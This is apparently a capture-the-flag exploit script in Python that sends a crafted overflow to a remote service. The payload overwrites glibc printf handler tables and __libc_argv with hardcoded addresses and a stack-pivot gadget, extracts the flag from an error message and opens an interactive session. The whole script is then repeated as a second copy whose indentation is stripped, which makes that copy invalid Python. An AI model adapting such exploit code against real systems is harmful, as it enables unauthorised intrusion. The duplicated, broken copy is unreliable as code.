hhc0null/exploit.py

## exploit.py
#!/usr/bin/env python

from pathlib import PurePath, Path
from tempfile import NamedTemporaryFile
from itertools import islice, cycle
from hexdump import hexdump as hd
import binascii
import hashlib
import re
import os
import shlex
import socket
import string
import struct
import subprocess
import sys
import time
import telnetlib

from random import choice
from string import ascii_letters, digits


# Utilities
def p(x, length=1, byteorder='little', signed=False):
    return int.to_bytes(x, length, byteorder, signed=signed)

def p64(x):
    return p(x, length=8)

def p32(x):
    return p(x, length=4)

def u(x, byteorder='little', signed=False):
    return int.from_bytes(x, byteorder, signed=signed)

# Additional
def pad(data, length):
    return bytes(islice(cycle(data), length))

'''
def a2n(s):
    return socket.inet_aton(s)

def n2a(s):
    return socket.inet_ntoa(s)
'''

def nasm(code, bits=64):
    asmcode = ("BITS {:d}\n{:s}".format(bits, code))

    source = NamedTemporaryFile(prefix='shellcode-', suffix='.s', delete=False)
    srcpath = source.name
    source.write(asmcode.encode())
    source.close()

    cmd = 'nasm {:s}'.format(str(source.name))
    r = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)

    o = Path(PurePath(source.name).with_suffix(''))
    shellcode = o.read_bytes()

    return shellcode

def _dp(data):
    global _debug
    if not _debug:
        return False
    print('[DEBUG] - raw\n', data, file=sys.stderr)
    return True

# Communicators

def read_until(f, delim='\n'):
    data = ""
    while not data.endswith(delim):
        data += f.read(1)
    return data

def connect(rhp):
    s = socket.create_connection(rhp)
    f = s.makefile('rw')
    print('[+] Connected to {:s}:{:d}'.format(*rhp))
    return s, f

def interact(s):
    t = telnetlib.Telnet()
    t.sock = s

    print('[+] Entering to interactive mode...')
    t.interact()

### user-defined
class IO(object):
    def __init__(self, rhp):
        self.rhp = rhp
        self.s, self.f = connect(self.rhp)

    def _read(self, size):
        return self.s.recv(size)

    def _write(self, buf):
        self.s.send(buf)

    def read(self, size=1):
        return self._read(size)

    def write(self, buf, end=b''):
        self._write(buf+end)

    def writeln(self, buf):
        self.write(buf, end=b'\n')

    def read_until(self, delim=b'\n'):
        buf = b''
        while not buf.endswith(delim):
            buf += self._read(1)
        return buf

    def flush(self):
        self.f.flush()

    def interact(self):
        interact(self.s)

    def close(self):
        self.f.close()
        self.s.close()

class RRIO(IO):
    def __init__(self, rhp, debug=False):
        self.debug = debug
        super(RRIO, self).__init__(rhp)

        #data = self.read_until()
        #_dp(data)

class Pwn(object):
    def attack(self, ip, port, local=False):
        main(ip, port, local)

def main(ip, port, local):
    if local:
        pass

    addr_name = 0x00000000006b73e0
    data = b''.join((
        #    1765: 00000000006b7980     8 OBJECT  GLOBAL DEFAULT   24 __libc_argv
        b'_'*(0x00000000006b7980-addr_name), # padding
        p64(0x00000000006b7ab8),
        b'_'*(0x00000000006b7a28-0x00000000006b7988), # padding
        p64(0x00000000006b7ab0-0x73*8), #    1509: 00000000006b7a28     8 OBJECT  GLOBAL DEFAULT   24 __printf_function_table
        p64(addr_name+0x800), #     846: 00000000006b7a30     8 OBJECT  GLOBAL DEFAULT   24 __printf_modifier_table
        b'_'*(0x00000000006b7aa8-0x00000000006b7a38), # padding
        p64(addr_name+0x800-0x73*8), #   1335: 00000000006b7aa8     8 OBJECT  GLOBAL DEFAULT   25 __printf_arginfo_table
        p64(0x40164e), # 0x00434162: pop rsp ; jmp rax ; #    1808: 00000000006b7ab0     8 OBJECT  GLOBAL DEFAULT   25 __printf_va_arg_table
        p64(0x6b4040),
    ))
    rrio = RRIO((ip, port,))
    rrio.writeln(data)
    out = rrio.read_until()
    the_flag = re.search(r"Error in \`([^']+)'", out.decode()).groups(1)[0]
    print('[+] The flag is: '+the_flag)
    rrio.interact()

if __name__ == '__main__':
    _debug = False

    try:
        import fire
        fire.Fire(Pwn)
    except:
        main(sys.argv[1], int(sys.argv[2]), len(sys.argv) > 3)

'''
'''
	#!/usr/bin/env python

	from pathlib import PurePath, Path
	from tempfile import NamedTemporaryFile
	from itertools import islice, cycle
	from hexdump import hexdump as hd
	import binascii
	import hashlib
	import re
	import os
	import shlex
	import socket
	import string
	import struct
	import subprocess
	import sys
	import time
	import telnetlib

	from random import choice
	from string import ascii_letters, digits


	# Utilities
	def p(x, length=1, byteorder='little', signed=False):
	return int.to_bytes(x, length, byteorder, signed=signed)

	def p64(x):
	return p(x, length=8)

	def p32(x):
	return p(x, length=4)

	def u(x, byteorder='little', signed=False):
	return int.from_bytes(x, byteorder, signed=signed)

	# Additional
	def pad(data, length):
	return bytes(islice(cycle(data), length))

	'''
	def a2n(s):
	return socket.inet_aton(s)

	def n2a(s):
	return socket.inet_ntoa(s)
	'''

	def nasm(code, bits=64):
	asmcode = ("BITS {:d}\n{:s}".format(bits, code))

	source = NamedTemporaryFile(prefix='shellcode-', suffix='.s', delete=False)
	srcpath = source.name
	source.write(asmcode.encode())
	source.close()

	cmd = 'nasm {:s}'.format(str(source.name))
	r = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)

	o = Path(PurePath(source.name).with_suffix(''))
	shellcode = o.read_bytes()

	return shellcode

	def _dp(data):
	global _debug
	if not _debug:
	return False
	print('[DEBUG] - raw\n', data, file=sys.stderr)
	return True

	# Communicators

	def read_until(f, delim='\n'):
	data = ""
	while not data.endswith(delim):
	data += f.read(1)
	return data

	def connect(rhp):
	s = socket.create_connection(rhp)
	f = s.makefile('rw')
	print('[+] Connected to {:s}:{:d}'.format(*rhp))
	return s, f

	def interact(s):
	t = telnetlib.Telnet()
	t.sock = s

	print('[+] Entering to interactive mode...')
	t.interact()

	### user-defined
	class IO(object):
	def __init__(self, rhp):
	self.rhp = rhp
	self.s, self.f = connect(self.rhp)

	def _read(self, size):
	return self.s.recv(size)

	def _write(self, buf):
	self.s.send(buf)

	def read(self, size=1):
	return self._read(size)

	def write(self, buf, end=b''):
	self._write(buf+end)

	def writeln(self, buf):
	self.write(buf, end=b'\n')

	def read_until(self, delim=b'\n'):
	buf = b''
	while not buf.endswith(delim):
	buf += self._read(1)
	return buf

	def flush(self):
	self.f.flush()

	def interact(self):
	interact(self.s)

	def close(self):
	self.f.close()
	self.s.close()

	class RRIO(IO):
	def __init__(self, rhp, debug=False):
	self.debug = debug
	super(RRIO, self).__init__(rhp)

	#data = self.read_until()
	#_dp(data)

	class Pwn(object):
	def attack(self, ip, port, local=False):
	main(ip, port, local)

	def main(ip, port, local):
	if local:
	pass

	addr_name = 0x00000000006b73e0
	data = b''.join((
	# 1765: 00000000006b7980 8 OBJECT GLOBAL DEFAULT 24 __libc_argv
	b'_'*(0x00000000006b7980-addr_name), # padding
	p64(0x00000000006b7ab8),
	b'_'*(0x00000000006b7a28-0x00000000006b7988), # padding
	p64(0x00000000006b7ab0-0x73*8), # 1509: 00000000006b7a28 8 OBJECT GLOBAL DEFAULT 24 __printf_function_table
	p64(addr_name+0x800), # 846: 00000000006b7a30 8 OBJECT GLOBAL DEFAULT 24 __printf_modifier_table
	b'_'*(0x00000000006b7aa8-0x00000000006b7a38), # padding
	p64(addr_name+0x800-0x73*8), # 1335: 00000000006b7aa8 8 OBJECT GLOBAL DEFAULT 25 __printf_arginfo_table
	p64(0x40164e), # 0x00434162: pop rsp ; jmp rax ; # 1808: 00000000006b7ab0 8 OBJECT GLOBAL DEFAULT 25 __printf_va_arg_table
	p64(0x6b4040),
	))
	rrio = RRIO((ip, port,))
	rrio.writeln(data)
	out = rrio.read_until()
	the_flag = re.search(r"Error in \`([^']+)'", out.decode()).groups(1)[0]
	print('[+] The flag is: '+the_flag)
	rrio.interact()

	if __name__ == '__main__':
	_debug = False

	try:
	import fire
	fire.Fire(Pwn)
	except:
	main(sys.argv[1], int(sys.argv[2]), len(sys.argv) > 3)

	'''
	'''